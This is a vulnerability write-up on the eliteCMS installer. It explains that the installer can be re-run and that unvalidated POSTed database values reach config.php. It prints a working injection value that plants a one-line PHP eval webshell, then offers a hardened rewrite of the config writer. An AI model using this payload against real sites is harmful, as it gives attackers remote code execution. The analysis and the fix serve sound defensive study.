eliteCMS's installer is not locked after installation completes, so an attacker can re-run the installation simply by visiting the installer URL.

A second vulnerability: the installer writes user-supplied values straight into admin/includes/config.php, which allows a one-line webshell to be written there.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
    ...

Now look at the code that fills those session values:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name POSTed is:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written into /admin/includes/config.php.
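For comparison, a hardened rewrite of the step-4 config writer, added here as an example (this is not eliteCMS's code). It refuses to run once an install lock exists, whitelists the identifier values, and emits every value through var_export() so a POSTed string can never close the PHP block. The lock-file path is an assumption for illustration.

```php
<?php
// Added example, not eliteCMS code: hardened replacement for the step-4 writer.
// Assumes session_start() has already run, as in the original installer.
$file = "../admin/includes/config.php";
$lock = "../admin/includes/install.lock";   // hypothetical lock file

// 1) Never allow a second installation: refuse if the lock already exists.
if (file_exists($lock)) {
    die("Installation is already complete; remove the installer directory.");
}

// 2) Validate each value before it gets anywhere near a PHP source file.
//    Host, database and user names are restricted to a safe character set.
function safe_identifier($value) {
    return is_string($value) && preg_match('/^[A-Za-z0-9_.\-]{1,64}$/', $value) === 1;
}
foreach (array('DB_SERVER', 'DB_NAME', 'DB_USER') as $key) {
    if (!isset($_SESSION[$key]) || !safe_identifier($_SESSION[$key])) {
        die("Invalid value for $key");
    }
}
// The password may legitimately contain any character, so it is escaped, not filtered.
$pass = isset($_SESSION['DB_PASS']) ? (string) $_SESSION['DB_PASS'] : '';

// 3) Emit each value as a PHP string literal via var_export(): quotes and
//    backslashes are escaped, so "?><?php ..." stays inside the literal and
//    cannot terminate the PHP block or open a new one.
$write = "<?php\n";
foreach (array('DB_SERVER', 'DB_NAME', 'DB_USER') as $key) {
    $write .= "define('$key', " . var_export($_SESSION[$key], true) . ");\n";
}
$write .= "define('DB_PASS', " . var_export($pass, true) . ");\n";
// The database connection code would follow here unchanged. No closing "?>"
// is written, so nothing can be appended after the end of the PHP block.

// 4) Write atomically and keep the file unreadable to other local users.
$tmp = $file . ".tmp";
if (file_put_contents($tmp, $write, LOCK_EX) === false || !rename($tmp, $file)) {
    die("Could not write configuration");
}
chmod($file, 0640);

// 5) Drop the lock so step 4 cannot be replayed.
file_put_contents($lock, date('c'));
```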